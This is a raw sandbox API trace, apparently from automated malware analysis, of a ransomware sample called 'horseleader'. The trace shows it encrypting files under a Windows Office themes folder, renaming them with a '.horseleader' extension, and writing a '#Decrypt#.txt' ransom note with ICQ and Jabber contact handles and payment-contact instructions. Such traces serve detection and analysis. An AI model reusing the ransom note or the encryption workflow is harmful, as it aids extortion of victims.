1 [0247.506] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.507] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.507] CloseHandle (hObject=0x1a4) returned 1 [0247.507] GetProcessHeap 
() returned 0x780000 [0247.507] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0247.507] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF.horseleader") returned 89 [0247.507] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\pixel\\preview.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\pixel\\preview.gif.horseleader")) returned 1 [0247.508] GetProcessHeap () returned 0x780000 [0247.508] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0247.508] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5ad387f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x54f1, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 1 [0247.508] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0247.508] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG") returned 78 [0247.508] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".horseleader") returned 0x0 [0247.508] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="#Decrypt#.txt") returned 1 [0247.509] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0247.509] 
lstrlenW (lpString=".testttjffg") returned 11 [0247.509] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG", lpSrch=".testttjffg") returned 0x0 [0247.509] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.509] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.509] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\pixel\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.517] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG") returned 78 [0247.517] StrStrW (lpFirst="THMBNAIL.PNG", lpSrch=".txt") returned 0x0 [0247.517] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=21745) returned 1 [0247.517] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.521] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.521] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.521] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: 
lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x4f1, lpOverlapped=0x0) returned 1 [0247.521] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffb0f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.521] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x4f1, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x4f1, lpOverlapped=0x0) returned 1 [0247.522] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.522] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.522] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.522] CloseHandle (hObject=0x1a4) returned 1 [0247.523] GetProcessHeap () returned 0x780000 [0247.523] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0247.523] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG.horseleader") returned 90 [0247.523] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\pixel\\thmbnail.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\pixel\\thmbnail.png.horseleader")) returned 1 [0247.524] GetProcessHeap () 
returned 0x780000 [0247.524] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0247.524] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5ad387f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x54f1, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 0 [0247.524] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0247.524] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\#Decrypt#.txt") returned 79 [0247.524] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\pixel\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0247.525] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0247.525] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0247.527] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0247.527] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0247.527] CloseHandle (hObject=0x158) returned 1 [0247.527] 
GetProcessHeap () returned 0x780000 [0247.527] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dbfd8 | out: hHeap=0x780000) returned 1 [0247.527] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a6f8e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d084c30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d084c30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="PROFILE", cAlternateFileName="")) returned 1 [0247.527] lstrcmpiW (lpString1="PROFILE", lpString2="Windows") returned -1 [0247.527] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE") returned 67 [0247.528] lstrcmpW (lpString1="PROFILE", lpString2=".") returned 1 [0247.528] lstrcmpW (lpString1="PROFILE", lpString2="..") returned 1 [0247.528] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0247.528] GetProcessHeap () returned 0x780000 [0247.528] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dbfd8 [0247.528] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\*") returned 69 [0247.528] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a6f8e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d084c30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d084c30, 
ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0247.529] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0247.529] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\.") returned 69 [0247.529] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0247.529] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a6f8e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d084c30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d084c30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="..", cAlternateFileName="")) returned 1 [0247.529] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0247.529] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\..") returned 70 [0247.529] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0247.529] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0247.529] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5a6f8e30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x53b, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0247.529] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") 
returned -1 [0247.530] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF") returned 79 [0247.530] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".horseleader") returned 0x0 [0247.530] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="#Decrypt#.txt") returned 1 [0247.530] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0247.530] lstrlenW (lpString=".testttjffg") returned 11 [0247.530] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF", lpSrch=".testttjffg") returned 0x0 [0247.530] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.530] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.530] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\profile\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.532] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF") returned 79 [0247.532] StrStrW (lpFirst="PREVIEW.GIF", lpSrch=".txt") returned 0x0 [0247.532] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=1339) returned 1 [0247.532] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x53b, lpOverlapped=0x0) returned 1 [0247.534] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffac5, 
lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.534] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x53b, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x53b, lpOverlapped=0x0) returned 1 [0247.535] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.535] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.535] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.535] CloseHandle (hObject=0x1a4) returned 1 [0247.535] GetProcessHeap () returned 0x780000 [0247.535] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0247.536] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF.horseleader") returned 91 [0247.536] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\profile\\preview.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\profile\\preview.gif.horseleader")) returned 1 [0247.537] GetProcessHeap () returned 0x780000 [0247.537] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0247.537] FindNextFileW (in: 
hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a053d00, ftCreationTime.dwHighDateTime=0x1cab7f2, ftLastAccessTime.dwLowDateTime=0x6d084c30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1a053d00, ftLastWriteTime.dwHighDateTime=0x1cab7f2, nFileSizeHigh=0x0, nFileSizeLow=0xb20e, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="PROFILE.ELM", cAlternateFileName="")) returned 1 [0247.537] lstrcmpiW (lpString1="PROFILE.ELM", lpString2="Windows") returned -1 [0247.537] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PROFILE.ELM") returned 79 [0247.537] StrStrIW (lpFirst="PROFILE.ELM", lpSrch=".horseleader") returned 0x0 [0247.537] lstrcmpW (lpString1="PROFILE.ELM", lpString2="#Decrypt#.txt") returned 1 [0247.537] lstrcmpW (lpString1="PROFILE.ELM", lpString2="_uninstalling_.png") returned 1 [0247.537] lstrlenW (lpString=".testttjffg") returned 11 [0247.537] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PROFILE.ELM", lpSrch=".testttjffg") returned 0x0 [0247.537] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.537] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.538] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PROFILE.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\profile\\profile.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.539] lstrlenW (lpString="\\\\?\\C:\\Program 
Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PROFILE.ELM") returned 79 [0247.539] StrStrW (lpFirst="PROFILE.ELM", lpSrch=".txt") returned 0x0 [0247.539] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=45582) returned 1 [0247.539] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.553] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.553] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.554] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.554] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.554] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.555] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x120e, lpOverlapped=0x0) returned 1 [0247.555] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffedf2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.555] WriteFile (in: hFile=0x1a4, 
lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x120e, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x120e, lpOverlapped=0x0) returned 1 [0247.555] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.555] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.555] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.555] CloseHandle (hObject=0x1a4) returned 1 [0247.556] GetProcessHeap () returned 0x780000 [0247.556] RtlAllocateHeap 